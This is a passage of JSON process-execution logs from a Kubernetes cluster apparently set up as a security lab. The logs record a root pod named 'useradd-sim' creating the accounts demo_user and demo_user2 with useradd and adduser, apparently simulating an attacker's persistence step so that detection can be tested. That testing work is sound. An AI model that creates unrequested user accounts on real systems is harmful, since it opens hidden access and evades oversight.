inInitTree","start_time":"2025-09-16T21:22:59.159155956Z","auid":4294967295,"docker":"d415441639c1a93e210d6de9a97699e","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTg1NTIwNDE2OTcyODY6NzIxNzMw","tid":721790,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTg1NTIwNDE2OTcyODY6NzIxNzMw","pid":721730,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/57cdb03cdcdf869ca6634674ed251d54dbca487dc32334bc6a8861f21b8b2894","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 57cdb03cdcdf869ca6634674ed251d54dbca487dc32334bc6a8861f21b8b2894 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:22:58.474914796Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTg1NTIwMzQwNjcyNDc6NzIxNzIy","tid":721730,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTg1NTIwMzQwNjcyNDc6NzIxNzIy","pid":721722,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/57cdb03cdcdf869ca6634674ed251d54dbca487dc32334bc6a8861f21b8b2894","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 57cdb03cdcdf869ca6634674ed251d54dbca487dc32334bc6a8861f21b8b2894 start","flags":"execve clone","start_time":"2025-09-16T21:22:58.467284437Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":721722,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:23:00.390876463Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0OTE2OTQxODU1OjExMjU0Njc=","pid":1125467,"uid":0,"cwd":"/","binary":"/bin/chfn","arguments":"-f  demo_user2","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.350159317Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":40,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","tid":1125467,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.350158807Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0OTAzMTE2NzUwOjExMjU0NjA=","pid":1125460,"uid":0,"cwd":"/","binary":"/sbin/usermod","arguments":"-p * demo_user2","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.336334006Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":33,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","tid":1125460,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.336333719Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0OTAwOTQzODg2OjExMjU0NTk=","pid":1125459,"uid":0,"cwd":"/etc/skel","binary":"/bin/find","arguments":". -print","flags":"execve clone inInitTree","start_time":"2025-09-17T18:20:11.334161125Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":32,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0OTAwMzg2Mzk5OjExMjU0NTg=","tid":1125459,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0OTAwMzg2Mzk5OjExMjU0NTg=","pid":1125458,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"cd /etc/skel; find .  -print\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.333603819Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":31,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","tid":1125458,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.334160855Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0OTAwMzg2Mzk5OjExMjU0NTg=","pid":1125458,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"cd /etc/skel; find .  -print\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.333603819Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":31,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","tid":1125458,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd 